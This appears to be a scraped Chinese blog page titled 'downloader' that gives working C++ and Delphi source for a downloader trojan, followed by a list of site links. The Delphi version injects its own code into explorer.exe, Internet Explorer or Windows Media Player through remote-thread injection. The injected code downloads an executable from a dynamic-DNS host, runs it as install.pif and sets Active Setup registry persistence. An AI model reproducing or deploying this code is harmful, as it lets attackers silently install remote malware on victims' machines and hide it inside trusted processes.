下载者
来源:互联网 发布:java sleep怎么用 编辑:程序博客网 时间:2024/05/01 19:03
//下面是经我简化的小程序(在windowsXP,C++6.0下调试通过)
#include<windows.h>
#include<urlmon.h>
#include<process.h>
#include<Shellapi.h> //这个头文件里有ShellExecute的定义
#pragma comment (lib,"Urlmon.lib")
int main()
{
URLDownloadToFile(NULL,"http://127.0.0.1/mfc.exe","C:/My.exe",0,NULL);
ShellExecute(0,"open","C:/My.exe",NULL,NULL,SW_SHOW);
return 0;
}
delphi版:
program InjectTheSelf;
{$IMAGEBASE $13140000}
uses Windows;
var
//动态加载shell32.dll中的ShellExecuteA函数
ShellRun:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;
//动态加载Urlmon.dll中的UrlDownloadToFileA函数
Downfile:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;
hShell,hUrlmon: THandle;
//插入IE需要用到的函数
function GetIEAppPath:string;
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software/Microsoft/Windows/CurrentVersion/App Paths/IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength := SizeOf(iename);
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := '%programfiles%/Internet Explorer/IEXPLORE.EXE';
RegCloseKey(iekey);
end;
//写注册表 用到的函数 为activeX启动准备
function Skrivreg(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
result := false;
RegCreateKey(key,PChar(subkey),regkey);
if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
result := true;
RegCloseKey(regkey);
end;
//插入media player用到的函数
function GetwmAppPath:string;
var
wmkey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software/Microsoft/Windows/CurrentVersion/App Paths/wmplayer.EXE',0,KEY_ALL_ACCESS,wmkey);
dLength := SizeOf(iename);
if RegQueryValueEx(wmkey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := '%programfiles%/Windows Media Player/wmplayer.EXE';
RegCloseKey(wmkey);
end;
procedure Download; //下载过程
begin
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell:=LoadLibrary('Shell32.dll');
hUrlmon:=LoadLibrary('urlmon.dll');
@ShellRun:= GetProcAddress(hShell,'ShellExecuteA');
@Downfile:= GetProcAddress(hUrlmon,'URLDownloadToFileA');
Downfile(nil,'http://remoteip.3322.org/c2c.exe','c:/temp/install.pif', 0, nil);
ShellRun(0,'open','c:/temp/install.pif',nil,nil,5);
ExitProcess(0);
end;
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
Module := Pointer(GetModuleHandle(nil));
//得到内存映像的长度
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//在Exp进程的内存范围内分配一个足够长度的内存
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
//确定起始基址和内存映像基址的位置
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定上面各项数据后,这里开始进行操作
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
//建立远程线程,至此注入过程完成
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
procedure RunInject(InjType:integer);
var
ProcessHandle, PID: longword;
begin
if InjType=0 then //注入explorer.exe
begin
//获取Exp进程的PID码
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
end
else
if InjType=3 then //注入 media player
begin
winexec(PChar(GetwmAppPath),sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('WMPlayerApp', nil), @Pid);
end
else //注入iexplore.exe
begin
//CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
winexec(PChar(GetIEAppPath),sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
end;
//打开进程
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
//关闭对像
CloseHandle(ProcessHandle);
end;
BEGIN
//activex自启动
skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE/Microsoft/Active Setup/Installed Components/{2bf41072-b2b1-21c1-b5c1-0305f4155515}','StubPath','c:/temp/install.pif');
RegDeleteKey(HKEY_current_user,'SOFTWARE/Microsoft/Active Setup/Installed Components/{2bf41072-b2b1-21c1-b5c1-0305f4155515}');
RunInject(3); //这里改为 :1 注入iexplore.exe 0 注入explorer.exe 3注人media player
end.
- 下载者
- 下载者
- 某下载者的下载接管
- vbs下载者和powershell下载器
- dll下载者~~
- 下载者+(原代码)
- XML下载者
- 下载者的新思路
- VC 下载者
- VC 下载者
- 一个下载者代码
- C++下载者源码
- VBS下载者
- VBS下载者
- 简单下载者学习
- 下载
- 下载
- 下载
- QQ自动发消息源代码
- 花指令添加源代码
- 关于X项目的报告
- (转,于大家共勉) 30岁前男人需要完成的事
- c# 中如何保存透明背景的gif文件
- 下载者
- linux内存共享
- 学习网站
- eclipse + tomcat 编写简单的Servlet程序
- .net调用oracle出现无法加载oramts.dll
- java 相关论坛或网站
- ArcMap9.x中对mxd文件进行浏览操作时频繁出现I/O问题
- struts标签
- 双击驱动器无法打开的问题解决方法